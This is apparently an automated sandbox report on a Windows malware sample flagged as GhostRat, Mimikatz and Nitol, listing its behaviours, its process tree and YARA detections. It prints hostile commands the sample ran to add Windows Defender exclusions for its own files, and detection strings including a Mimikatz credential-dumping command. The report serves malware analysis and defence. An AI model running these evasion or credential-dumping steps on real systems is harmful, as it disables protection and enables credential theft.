Edit tour

Windows Analysis Report
SystemProcess18.exe

Overview

General Information

Sample name:	SystemProcess18.exe
Analysis ID:	1640060
MD5:	ddc764d0b18c5af9f7e94e9d5eebb48f
SHA1:	a06d80258da2a37c316b56cd73423a1127ff0079
SHA256:	299e6791e4eb85617c4fab7f27ac53fb70cd038671f011007831b558c318b369
Tags:	exeuser-tvishwa107
Infos:

Detection

GhostRat, Mimikatz, Nitol

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GhostRat

Yara detected Mimikatz

Yara detected Nitol

Adds a directory exclusion to Windows Defender

Contains functionality to detect sleep reduction / modifications

Found API chain indicative of debugger detection

Found evasive API chain (may stop execution after checking mutex)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Execution from Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to communicate with device drivers

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SystemProcess18.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\SystemProcess18.exe" MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)

cmd.exe (PID: 7456 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SystemProcess18.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\SystemProcess18.exe" MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)

cmd.exe (PID: 7540 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7660 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5352 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8052 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

schtasks.exe (PID: 3340 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 344 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3744 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6620 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4556 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7680 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4160 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7812 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8156 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4484 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7828 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5640 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2280 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7472 cmdline: cmd /c md C:\Users\Public\Documents\MM MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8052 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6832 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SystemProcess18.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7648 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3996 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7592 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6448 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1944 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4680 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1560 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3956 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4928 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2968 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2792 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4932 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4900 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3384 cmdline: schtasks /Query /TN MM MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchos1.exe (PID: 3400 cmdline: C:\Users\Public\Documents\MM\svchos1.exe MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)

svchos1.exe (PID: 5780 cmdline: "C:\Users\Public\Documents\MM\svchos1.exe" MD5: DDC764D0B18C5AF9F7E94E9D5EEBB48F)

powershell.exe (PID: 7028 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8084 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1388 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4196 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\MM\svchos1.exe'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
MimiKatz	Varonis summarizes Mimikatz as an open-source application that allows users to view and save authentication credentials like Kerberos tickets. Benjamin Delpy continues to lead Mimikatz developments, so the toolset works with the current release of Windows and includes the most up-to-date attacks.Attackers commonly use Mimikatz to steal credentials and escalate privileges: in most cases, endpoint protection software and anti-virus systems will detect and delete it. Conversely, pentesters use Mimikatz to detect and exploit vulnerabilities in your networks so you can fix them.	APT32 Anunak GALLIUM	http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks http://www.secureworks.com/research/threat-profiles/gold-burlap http://www.secureworks.com/research/threat-profiles/gold-drake	https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000001D.00000002.3732839256.000000000316B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
0000001C.00000002.3734597891.000000000356C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
0000001C.00000002.3734864842.00000000036AB000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
0000001D.00000002.3732199510.0000000002A6C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
28.2.svchos1.exe.36bcd38.5.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
29.2.svchos1.exe.317cd38.5.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
29.2.svchos1.exe.318c380.6.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.358cd04.1.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
28.2.svchos1.exe.357d6bc.3.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
29.2.svchos1.exe.2a7d6bc.3.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x7b12:$h1: Hid_State 0x7b26:$h2: Hid_StealthMode 0x7b46:$h3: Hid_HideFsDirs 0x7b64:$h4: Hid_HideFsFiles 0x7b84:$h5: Hid_HideRegKeys 0x7ba4:$h6: Hid_HideRegValues 0x7bc8:$h7: Hid_IgnoredImages 0x7bec:$h8: Hid_ProtectedImages 0xc42e:$s1: FLTMGR.SYS 0xc9aa:$s2: HAL.dll 0x954e:$s3: \SystemRoot\System32\csrss.exe 0xad84:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ 0x258:$s5: INIT 0xbe7e:$s6: \hidden-master\Debug\QAssist.pdb
28.2.svchos1.exe.36cc380.4.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
29.2.svchos1.exe.2a8cd04.4.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xaa30:$h1: Hid_State 0xaa50:$h2: Hid_StealthMode 0xaa70:$h3: Hid_HideFsDirs 0xaa90:$h4: Hid_HideFsFiles 0xaab0:$h5: Hid_HideRegKeys 0xaad0:$h6: Hid_HideRegValues 0xab00:$h7: Hid_IgnoredImages 0xab30:$h8: Hid_ProtectedImages 0xfb5a:$s1: FLTMGR.SYS 0xc6b0:$s3: \SystemRoot\System32\csrss.exe 0xe080:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
29.2.svchos1.exe.317cd38.5.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
29.2.svchos1.exe.317cd38.5.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24104:$x4: Http/1.1 403 Forbidden 0x24104:$s5: Http/1.1 403 Forbidden
29.2.svchos1.exe.317cd38.5.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bb:$x1: sekurlsa::logonpasswords
29.2.svchos1.exe.317cd38.5.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
29.2.svchos1.exe.318c380.6.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
29.2.svchos1.exe.318c380.6.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14abc:$x4: Http/1.1 403 Forbidden 0x14abc:$s5: Http/1.1 403 Forbidden
29.2.svchos1.exe.318c380.6.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a73:$x1: sekurlsa::logonpasswords
29.2.svchos1.exe.318c380.6.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
29.2.svchos1.exe.2a8cd04.4.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
29.2.svchos1.exe.2a8cd04.4.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x14abc:$x4: Http/1.1 403 Forbidden 0x14abc:$s5: Http/1.1 403 Forbidden
29.2.svchos1.exe.2a8cd04.4.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x14a73:$x1: sekurlsa::logonpasswords
29.2.svchos1.exe.2a8cd04.4.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0xb630:$h1: Hid_State 0xb650:$h2: Hid_StealthMode 0xb670:$h3: Hid_HideFsDirs 0xb690:$h4: Hid_HideFsFiles 0xb6b0:$h5: Hid_HideRegKeys 0xb6d0:$h6: Hid_HideRegValues 0xb700:$h7: Hid_IgnoredImages 0xb730:$h8: Hid_ProtectedImages 0x1135a:$s1: FLTMGR.SYS 0xd2b0:$s3: \SystemRoot\System32\csrss.exe 0xec80:$s4: \REGISTRY\MACHINE\SYSTEM\ControlSet001\%wZ
29.2.svchos1.exe.2a7d6bc.3.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
29.2.svchos1.exe.2a7d6bc.3.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24104:$x4: Http/1.1 403 Forbidden 0x24104:$s5: Http/1.1 403 Forbidden
29.2.svchos1.exe.2a7d6bc.3.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bb:$x1: sekurlsa::logonpasswords
29.2.svchos1.exe.2a7d6bc.3.raw.unpack	INDICATOR_TOOL_RTK_HiddenRootKit	Detects the Hidden public rootkit	ditekSHen	0x8712:$h1: Hid_State 0x1ac78:$h1: Hid_State 0x8726:$h2: Hid_StealthMode 0x1ac98:$h2: Hid_StealthMode 0x8746:$h3: Hid_HideFsDirs 0x1acb8:$h3: Hid_HideFsDirs 0x8764:$h4: Hid_HideFsFiles 0x1acd8:$h4: Hid_HideFsFiles 0x8784:$h5: Hid_HideRegKeys 0x1acf8:$h5: Hid_HideRegKeys 0x87a4:$h6: Hid_HideRegValues 0x1ad18:$h6: Hid_HideRegValues 0x87c8:$h7: Hid_IgnoredImages 0x1ad48:$h7: Hid_IgnoredImages 0x87ec:$h8: Hid_ProtectedImages 0x1ad78:$h8: Hid_ProtectedImages 0xd02e:$s1: FLTMGR.SYS 0x209a2:$s1: FLTMGR.SYS 0xd5aa:$s2: HAL.dll 0xa14e:$s3: \SystemRoot\System32\csrss.exe 0x1c8f8:$s3: \SystemRoot\System32\csrss.exe
28.2.svchos1.exe.357d6bc.3.raw.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
28.2.svchos1.exe.357d6bc.3.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x24104:$x4: Http/1.1 403 Forbidden 0x24104:$s5: Http/1.1 403 Forbidden
28.2.svchos1.exe.357d6bc.3.raw.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x240bb:$x1: sekurlsa::logonpasswords
